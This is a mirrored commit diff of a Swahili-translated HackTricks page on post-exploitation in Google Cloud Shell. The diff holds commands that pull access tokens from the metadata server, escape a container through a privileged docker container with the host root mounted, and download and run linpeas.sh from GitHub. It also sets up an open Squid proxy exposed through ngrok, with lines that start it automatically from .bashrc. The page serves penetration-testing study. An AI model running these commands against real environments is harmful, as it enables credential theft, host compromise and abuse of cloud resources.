gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-12 07:40:49 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-cloud/gcp-security/gcp-post-exploitation

Browse Source
This commit is contained in:
Translator
2025-12-08 11:37:52 +00:00
parent c0b3b29db6
commit be5043d6fb
1 changed files with 31 additions and 45 deletions
Download Patch File Download Diff File Expand all files Collapse all files

76
src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
View File

@@ -4,46 +4,46 @@
## Cloud Shell
Kwa habari zaidi kuhusu Cloud Shell angalia:
Kwa taarifa zaidi kuhusu Cloud Shell angalia:
{{#ref}}
../gcp-services/gcp-cloud-shell-enum.md
{{#endref}}
### Container Escape
### Inapata token ya mtumiaji kutoka metadata
Kumbuka kwamba Google Cloud Shell inaendesha ndani ya container, unaweza **easily escape to the host** kwa kufanya:
Kwa kuwasiliana tu na metadata server unaweza kupata token ya kuingia kama mtumiaji aliyesajiliwa sasa:
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
```
### Container Escape / Docker use
> [!WARNING]
> Hapo awali, cloud shell ilikuwa ikikimbia ndani ya container iliyo na ufikiaji wa docker socket ya host. Sasa Google imebadilisha usanifu, na container ya cloud shell sasa inaendesha muundo wa "Docker in a container". Kwa hivyo hata ikiwa inawezekana kutumia docker kutoka cloud shell, hutaweza kutoroka kwenda host kwa kutumia docker socket.
> Kumbuka kwamba hapo awali faili ya `docker.sock` ilikuwa imewekwa katika `/google/host/var/run/docker.sock`, lakini sasa imehamishwa hadi `/run/docker.sock`.
<details>
<summary>Container escape commands</summary>
<summary>Docker use / Old container escape commands</summary>
```bash
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
sudo docker -H unix:///run/docker.sock pull alpine:latest
sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///run/docker.sock start escaper
sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh
```
</details>
Hii haichukuliwi kama udhaifu na google, lakini inakupa mtazamo mpana wa kile kinachotokea katika mazingira hayo.
Zaidi ya hayo, zingatia kwamba kutoka kwenye host unaweza kupata service account token:
Zaidi ya hayo, hapo zamani ilikuwa inawezekana kupata token kwa service account iliyotumiwa na cloud shell VM kwenye metadata server:
<details>
<summary>Pata service account kutoka metadata</summary>
<summary>Service account ya zamani kutoka metadata</summary>
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
```
</details>
Kwa ruhusa zifuatazo:
<details>
<summary>Pata ruhusa za akaunti ya huduma</summary>
Kwa scopes zifuatazo:
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
@@ -53,23 +53,11 @@ https://www.googleapis.com/auth/monitoring.write
```
</details>
Orodhesha metadata na LinPEAS:
<details>
<summary>Orodhesha metadata na LinPEAS</summary>
```bash
cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud
```
</details>
Baada ya kutumia [https://github.com/carlospolop/bf_my_gcp_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) na token ya Service Account **hakuna ruhusa iliyogunduliwa**...
### Tumia kama Proxy
Ikiwa unataka kutumia google cloud shell instance yako kama proxy, unahitaji kuendesha amri zifuatazo (au kuziongeza kwenye faili .bashrc):
Ikiwa unataka kutumia instance yako ya google cloud shell kama proxy unahitaji kuendesha amri zifuatazo (au uziingize kwenye faili .bashrc):
<details>
@@ -79,7 +67,7 @@ sudo apt install -y squid
```
</details>
Kwa taarifa tu, Squid ni http proxy server. Unda faili **squid.conf** na mipangilio ifuatayo:
Kwa taarifa, Squid ni http proxy server. Unda faili **squid.conf** na mipangilio ifuatayo:
<details>
@@ -92,45 +80,43 @@ http_access allow all
```
</details>
nakili faili **squid.conf** kwenda **/etc/squid**
nakili faili ya **squid.conf** hadi **/etc/squid**
<details>
<summary>Nakili config kwenda /etc/squid</summary>
<summary>Nakili config kwenye /etc/squid</summary>
```bash
sudo cp squid.conf /etc/squid
```
</details>
Hatimaye, endesha huduma ya Squid:
Hatimaye endesha huduma ya squid:
<details>
<summary>Anzisha huduma ya Squid</summary>
<summary>Anzisha huduma ya squid</summary>
```bash
sudo service squid start
```
</details>
Tumia ngrok ili proxy iweze kupatikana kutoka nje:
Tumia ngrok ili proxy ipatikane kutoka nje:
<details>
<summary>Fungua proxy kwa ngrok</summary>
<summary>Fungua proxy kwa kutumia ngrok</summary>
```bash
./ngrok tcp 3128
```
</details>
Baada ya kuendesha, nakili URL ya tcp://.
Baada ya kuendesha, nakili URL ya tcp://. Ikiwa unataka kuendesha proxy kutoka kwa kivinjari, inapendekezwa kuondoa sehemu ya tcp:// na port, kisha weka port katika uwanja wa port wa mipangilio ya proxy wa kivinjari chako (squid ni http proxy server).
Iwapo unataka kuendesha proxy kutoka kwa kivinjari, inashauriwa kuondoa sehemu ya tcp:// na port, kisha kuweka port katika shamba la port la mipangilio ya proxy ya kivinjari chako (squid ni http proxy server).
Kwa matumizi bora wakati wa kuanzisha, faili .bashrc inapaswa kuwa na mistari ifuatayo:
Ili matumizi bora wakati wa kuanzisha, faili .bashrc inapaswa kuwa na mistari zifuatazo:
<details>
<summary>Ongeza kwenye .bashrc kwa kuanza kiotomatiki</summary>
<summary>Ongeza kwenye .bashrc kwa kuanzisho kiotomatiki</summary>
```bash
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
@@ -139,6 +125,6 @@ cd ngrok;./ngrok tcp 3128
```
</details>
Maelekezo yamekopwa kutoka [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Angalia ukurasa huo kwa mawazo mengine ya ajabu ya kuendesha aina yoyote ya software (databases na hata windows) katika Cloud Shell.
Maelekezo yalichukuliwa kutoka [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Angalia ukurasa huo kupata mawazo mengine ya wazimu ya kuendesha aina yoyote ya programu (databases na hata windows) katika Cloud Shell.
{{#include ../../../banners/hacktricks-training.md}}